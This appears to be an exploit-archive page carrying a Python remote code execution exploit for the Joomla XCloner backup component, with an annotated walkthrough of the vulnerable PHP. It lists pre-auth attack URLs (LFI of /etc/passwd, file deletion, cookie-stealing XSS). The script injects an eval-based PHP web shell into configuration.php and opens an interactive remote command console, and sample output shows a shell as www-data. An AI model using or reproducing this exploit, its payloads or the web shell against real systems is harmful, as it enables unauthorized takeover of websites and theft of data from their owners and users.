ExploitFixes
Joomla XCloner Component (com_xcloner-backupandrestore) Remote Command Execution 2011-02-25 20:15:07

#!/usr/bin/python
#
# Joomla component (com_xcloner-backupandrestore) remote code execution exploit
# Vendor: http://www.xcloner.com/
#
# "Our true divinity is in our ability to create. And armed with the understanding of the symbiotic connections
# of life, while being guided by the emergent nature of reality, there is nothing we cannot do or accomplish."
# - Zeitgeist addendum
#
# Target Environment Settings:
# ============================
# register_globals = On/Off (doesnt matter)
#
# Description:
# ============
# XCloner is a Website Backup and Restore application designed for PHP/Mysql websites, it can work as a native plugin for WordPress and Joomla!.
# XCloner design was specifically created to Generate custom backups of any LAMP website through custom admin inputs, and to be able to Restore
# the clone on any other location with the help of the automatic Restore script we provide, independent from the main package!
#
# XCloner Backup tool uses Open Source standards like TAR and Mysql formats so you can rest assured your backups can be restored in a variety
# of ways, giving you more flexibility and full control.
#
# Vulnerability List (wordpress/joomla) & Explanation:
# ====================================================
# Here is the list of pre - auth vulns o.O:
#
# Information Disclosure with phpinfo()
# http://[target]/[path]/wp-content/plugins/xcloner-backup-and-restore/restore/XCloner.php?task=info
# http://[target]/[path]/administrator/components/com_xcloner-backupandrestore/restore/XCloner.php?task=info
#
# Local File Inclusion:
# http://[target]/[path]/wp-content/plugins/xcloner-backup-and-restore/cloner.cron.php?config=../../../../../../../../etc/passwd
# http://[target]/[path]/administrator/components/com_xcloner-backupandrestore/cloner.cron.php?config=../../../../../../../../etc/passwd
#
# DoS/damage by calling unlink() on wordpress/joomla files:
# http://[target]/[wp path]/wp-content/plugins/xcloner-backup-and-restore/restore/XCloner.php?task=step2&output_path=[path]/[file]
# http://[target]/[path]/administrator/components/com_xcloner-backupandrestore/restore/XCloner.php?task=step2&output_path=[path]/[file]
#
# XSS:
# http://[target]/[path]/wp-content/plugins/xcloner-backup-and-restore/index2.php?option=com_cloner&mosmsg=<script>alert(document.cookie)</script>
# http://[target]/[path]/wp-content/plugins/xcloner-backup-and-restore/index2.php?username=adsc&password=dac&option=com_cloner
# ";alert(document.cookie)//&task=dologin&boxchecked=0&hidemainmenu=0
# http://[target]/[path]/administrator/components/com_xcloner-backupandrestore/index2.php?option=com_cloner&mosmsg=
# <script>alert(document.cookie)</script>
#
# Not to mention the post - auth bugs...... but the most potent, pre-auth rce (joomla only). Enough yip yap, here we go....
#
# By accessing the XCloner.php page, the webmaster is presented an important message: "Security Note: After restore delete the
# XCloner.php script from your server". So my understanding is that the vulnerable code in this file, is sitting on web servers
# without requiring authentication to access until a restore happens. o.O. Below is an explanation of the vulnerable code, sorry but
# this is going to be long:
#
# The XCloner.php script begins by setting the array element 'output_path' of $_CONFIG to our input on line 72:
#
# $_CONFIG['output_path'] = $_REQUEST['output_path'];
#
# Later on we see a simple switch on lines 134-150 on our task parameter
#
# switch ($_REQUEST[task]) {
# case 'step2':
# step2();
# break;
#
# We follow the case "step2" switch and land into that function (step2()) defined on lines 178-?. Inside that function we set the
# $_CONFIG array to global. The attacker must make sure that they DO NOT set the 'DBcreated' or 'transfer_mode' variable to 'on' or '2'
# (respectively) as it will kill our script when if it fails to connect to the database or FTP server. This is important to note,
# you will see later on.
#
# function step2($file=""){
#
# global $_CONFIG,$filepath ;
# $DBcreated = $_REQUEST[DBcreated];
#
# if ($DBcreated=='on'){
#
# -- snip --
#
# $db = @mysql_connect($DBhostname, $DBuserName, $DBpassword) or die("<br />The database details provided are incor... blah blah
#
# -- snip --
#
# if($_REQUEST[transfer_mode]==2){
#
# -- snip --
#
# // set up basic connection
# $conn_id = @ftp_connect($_REQUEST[ftp_server], $_REQUEST[ftp_port]) or die("<span class='error'>Could not connect to .. blah blah
#
# We keep looking and we see something interesting on lines 473 - 483
#
# if(($_REQUEST['do_database'] != 1) || ($_REQUEST['files_skip'] == 1)){
# $config_file = $_CONFIG[output_path]."/configuration.php";
# @chmod($config_file,0777);
# @unlink($_CONFIG[output_path]."/administrator/backups/perm.txt");
# if(($_CONFIG['sql_usefile'] == "database-sql.sql") and ($update_config))
# if(write_config($config_file)){
# echo "<H2>Configuration updated!</H2>";
# }else{
# echo "<span class='error'>Unable to write to configuration file $config_file... Aborting...</span>";return;
# }
# }
#
# So an attacker must ensure that our request does not contain any 'do_database' variable or have the 'files_skip' variable containing a
# value of '1'. If the attacker calls the configuration.php with a null byte (../../../../configuration.php%00) then the unlink() will be
# triggered and delete the config file we are trying to backdoor! So the attacker can specify the 'output_path' variable to
# '../../../../' instead and simply let the application append the 'configuration.php'. Now lets break down the call to write_config()
# which is defined at line 547
#
# function write_config($file){
# echo "made it here";
# if(@$fp = fopen($file, "r")){
# $config_data = "";
# while(!feof($fp))
# $config_data .= fread($fp, 1024);
# fclose($fp);
# }
#
# Ok so the script reads the file into $config_data variable.
#
# if ($_REQUEST[DBcreated] == 'on'){
#
# $config_data = str_replace("define('DB_HOST', '", "define('DB_HOST', '".$_REQUEST[mysql_server]."');#", $config_data);
# $config_data = str_replace("define('DB_USER', '", "define('DB_USER', '".$_REQUEST[mysql_username]."');#
#
# -- snip --
#
# if($_REQUEST['transfer_mode'] == 2){
# $config_data = str_replace('$'.'ftp_host =',"$"."ftp_host ='".$_REQUEST[ftp_server]."';#", $config_data);
# $config_data = str_replace('$'.'ftp_port =',"$"."ftp_port ='".$_REQUEST[ftp_port]."';#", $config_
#
# -- snip --
#
# Now if the 'DBcreated' variable is set to 'on' or the 'transfer_mode' variable is set to '2', the attacker can overwrite the configuration.php
# file with 'mysql_server', 'mysql_username' or 'ftp_server', 'ftp_port' variables etc. However, the beginning of the XCloner.php script will
# kill the execution simply because setting those values will force the code to make an authentication, fail (if credz are wrong) and then die.
#
# if we keep looking, from line 585 we see:
#
# $config_data = str_replace('$'.'live_site =',"$"."live_site ='".$_REQUEST[output_url_pref]."://".$_REQUEST[output_url]."';#", $config_data);
#
# if ($fp = fopen($file, "w")) {
# fwrite( $fp, $config_data);
# fclose( $fp );
# } else {
# return false;
# } // if
# return true;
# }
#
# This is not part of the if statements like before, so the attacker at this point can simply overwrite the '$live_site' variable contained
# within configuration.php with 'malicious' code by setting the 'output_url_pref' variable accordingly.
#
# Exploitation:
# =============
# Seems to be that joomla and wordpress both have the vulnerable code in their plugins however only joomla uses the $live_site
# variable in their configuration file.
#
# Simply set the backdoor in configuration.php against our target:
# http://[target]/[path]administrator/components/com_xcloner-backupandrestore/restore/XCloner.php?
# task=step2&output_url_pref=';+}+?>+<?php+eval($_GET['lol']);+?>&output_path=../../../../
# Execute our code:
# http://[target]/[path]/?lol=phpinfo();
# http://[target]/[path]/?lol=system("id");
#
# [[email protected] xcloner]$ python 0day.py -p localhost:8080 -t 192.168.1.3 -d /webapps/joomla/
#
# | ----------------------------------------------------------------------------- |
# | Joomla component (com_xcloner-backupandrestore) remote code execution explo!t |
# | by mr_me - net-ninja.net ---------------------------------------------------- |
#
# (+) Testing proxy @ localhost:8080.. proxy is found to be working!
# (+) Targeting http://192.168.1.3/webapps/joomla/
# (!) Exploit working!
# (+) Droping to remote console (q for quit)
#
# [email protected]# id
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
#
# [email protected]# q

import sys
import urllib
import re
import urllib2
import getpass
import base64
from optparse import OptionParser

usage = "./%prog [<options>] -t [target] -d [directory]"
usage += "\nExample: ./%prog -p localhost:8080 -t 192.168.1.7 -d /joomla/"

parser = OptionParser(usage=usage)
parser.add_option("-p", type="string",action="store", dest="proxy",
help="HTTP Proxy <server:port>")
parser.add_option("-t", type="string", action="store", dest="target",
help="The Target server <server:port>")
parser.add_option("-d", type="string", action="store", dest="dirPath",
help="Directory path to the CMS")

(options, args) = parser.parse_args()

def banner():
print "\n\t| ----------------------------------------------------------------------------- |"
print "\t| Joomla component (com_xcloner-backupandrestore) remote code execution explo!t |"
print "\t| by mr_me - net-ninja.net ---------------------------------------------------- |\n"

if len(sys.argv) < 5:
banner()
parser.print_help()
sys.exit(1)

def testProxy():
check = 1
sys.stdout.write("(+) Testing proxy @ %s.. " % (options.proxy))
sys.stdout.flush()
try:
req = urllib2.Request("http://www.google.com/")
req.set_proxy(options.proxy,"http")
check = urllib2.urlopen(req)
except:
check = 0
pass
if check != 0:
sys.stdout.write("proxy is found to be working!\n")
sys.stdout.flush()
else:
print "proxy failed, exiting.."
sys.exit(1)

def interactiveAttack():
print "(+) Droping to remote console (q for quit)\n"
hn = "%[email protected]%s# " % (getpass.getuser(), options.target)
preBaseCmd = ""
while preBaseCmd != 'q':
preBaseCmd = raw_input(hn)
preBaseCmdSetup = ("system(\"%s\");" % (preBaseCmd))
cmdInBase64 = base64.b64encode(preBaseCmdSetup)
cookieCmd = ("lol=%s;" % (cmdInBase64))
resp = getServerResponse(options.target + options.dirPath, cookieCmd, None)
result = resp.split("://")[0]
print result

def getServerResponse(exploit, header=None, data=None):
try:
headers = {}
if header != None:
headers['Cookie'] = header
if data != None:
data = urllib.urlencode(data)
req = urllib2.Request("http://"+exploit, data, headers)
if options.proxy:
req.set_proxy(options.proxy,"http")
check = urllib2.urlopen(req).read()
except urllib.error.HTTPError, error:
check = error.read()
except urllib.error.URLError:
print "(-) Target connection failed, check your address"
sys.exit(1)
return check

def backdoorTarget():
print "(+) Targeting http://%s%s" % (options.target, options.dirPath)
phpShell = "'; } ?> <?php eval(base64_decode($_COOKIE['lol'])); ?>"
backdoorReq = ("administrator/components/com_xcloner-backupandrestore/restore/XCloner.php")
data = {'task':'step2', 'output_url_pref':phpShell, 'output_path':'../../../../'}
req = options.target + options.dirPath + backdoorReq
check = getServerResponse(req, None, data)

if re.search("All should be done! Click here to continue...", check):
print "(!) Exploit working!"
interactiveAttack()
else:
print "(-) Exploit failed, exiting.."
sys.exit(1)

def main():
banner()
if options.proxy:
testProxy()
backdoorTarget()

if __name__ == "__main__":
main()